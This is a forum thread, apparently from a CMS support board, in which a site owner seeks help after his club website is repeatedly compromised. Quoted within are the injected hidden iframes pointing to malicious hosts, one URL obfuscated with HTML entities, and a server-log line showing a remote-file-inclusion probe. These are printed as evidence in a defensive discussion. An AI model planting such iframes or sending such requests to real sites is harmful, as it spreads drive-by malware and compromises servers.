somehow someone modified my index.php file

Quote::

<html dir="ltr" lang="en"><head><base href="http://www.mr2oc.co.uk/"><title>MR2 Owners Club � News</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" _base_href="http://www.mr2oc.co.uk/"><meta http-equiv="expires" content="0" _base_href="http://www.mr2oc.co.uk/"><meta http-equiv="imagetoolbar" content="no" _base_href="http://www.mr2oc.co.uk/"><meta name="description" content="News Probably the best MR2 club in the world" _base_href="http://www.mr2oc.co.uk/"><meta name="keywords" content="News, news, new, headlines" _base_href="http://www.mr2oc.co.uk/"><meta name="resource-type" content="document" _base_href="http://www.mr2oc.co.uk/"><meta name="distribution" content="global" _base_href="http://www.mr2oc.co.uk/"><meta name="author" content="MR2 Owners Club" _base_href="http://www.mr2oc.co.uk/"><meta name="copyright" content="Copyright (c) 2006 by MR2 Owners Club" _base_href="http://www.mr2oc.co.uk/"><meta name="robots" content="index, follow" _base_href="http://www.mr2oc.co.uk/"><meta name="rating" content="general" _base_href="http://www.mr2oc.co.uk/"><meta name="generator" content="CPG Dragonfly CMS: Copyright (c) 2003-2006 by CPG-Nuke Development Team, dragonflycms.org" _base_href="http://www.mr2oc.co.uk/"><meta name="MSSmartTagsPreventParsing" content="true" _base_href="http://www.mr2oc.co.uk/"><link rel="shortcut icon" href="themes/cpgnuke/images/favicon.ico" type="image/x-icon" _base_href="http://www.mr2oc.co.uk/"><link rel="copyright" href="index.php?name=credits" title="Copyrights" _base_href="http://www.mr2oc.co.uk/"><link rel="author" href="index.php?name=Members_List" title="Members List" _base_href="http://www.mr2oc.co.uk/"><link rel="alternate" type="application/rss+xml" title="RSS" href="rss/news2.php" _base_href="http://www.mr2oc.co.uk/"><link rel="stylesheet" type="text/css" href="themes/cpgnuke/style/style.css" _base_href="http://www.mr2oc.co.uk/"></head><body><iframe src="http://yauwvhhzml.biz/dl/adv442.php" height="1" width="1"></iframe>?

Quote::

<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#121;&#97;&#117;&#119;&#118;&#104;&#104;&#122;&#109;&#108;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#52;&#52;&#50;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><?php

this caused a script popup window and froze IE

i uploaded the default index.php file and it appears to be ok now

how do i stop this happening again ?

Its right above the topic you just posted:
Forums/viewtopic/t=2864.html

no its not , that post only says what to do after a hack , im asking how to prevent this happening again

From that post:

Quote::

Before anyone can help or offer suggestions you need to understand and provide a few bits of information first.

You have to gather certain info to lean how you were hacked. Without knowing how you were hacked, how can you prevent it?

1. What type of server are you using?
2. What software is the server running on your site?
3. What is your provider using for a control panel to administer your site?
4. Stay on top of patches and security notes that are released. Is this the case for you?
6. Review the logs.
7. Report the incident to your host/provider/law enforcement/other agency. What did your service provider/host say?

this keeps happening over and over

Quote::

"GET /index.php?name=Your_Account&profile=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 5 "-" "-"

taken from server log

jeffk wrote:

this keeps happening over and over Quote:: "GET /index.php?name=Your_Account&profile=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 5 "-" "-" taken from server log

Are you sure you have applied the official 9.0.6.1 security patches? (xss fixes and more)

tbh , no

ive installed what ive seen on the forums

xss fixes , dont think so

is there a central place for all updates please ?

jeffk wrote:

is there a central place for all updates please ?

They're in the sticky topic in this Forum and they used to be announced through system update notification.

Hmmm, apart from those four fixes there's another 9.0.6.1 fix here as well: cvs/html/modules/Your_Account/index.php?v=9.17.2.1
EDIT: download is here

Perhaps an official 9.0.6.2 would be in order with the applicable security patches? Might help some of our less technically inclined folks.

Beldak wrote:

Perhaps an official 9.0.6.2 would be in order with the applicable security patches? Might help some of our less technically inclined folks.

That sounds like a good idea

uploaded all the fixes i can find

keep getting iframes added to the site , just had a drive cleaner popup

sample of iframe injection

Quote::

<div class="table1"> <div class="option" align="center"></div> <div style="text-align:center"><img src="http://i16.photobucket.com/albums/b36/falinn/JAE%2006/DSC_6909.jpg" border="0" alt="" /></div> </div><br /> <iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe> <iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe> <table class="newstable"> <tr> <td class="newstopic"><a href="index.php?name=News&amp;topic=1"><img src="images/topics/beamsnews.gif" alt="latest news" border="0" /></a></td> <td class="newsarticle">

Hmm, i suddenly wondered if it could be an security problem with a third party module. Unfortunately your site gives a blank page now.

speaking to the server hosting company atm


seems like a new ftp account was created , they are unsure how

seems like very directory has had an index.html file created

ie /home/xxxxx/public_html/language/index.html

there hunders of altered files on the server now

the index file contents are

<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

Looks fine from where I am at. No POPUP or Iframe.

it was just above the news items , in FF it was two small squares


the host is uploading last nights back up atm , so it prolly wont be available for a while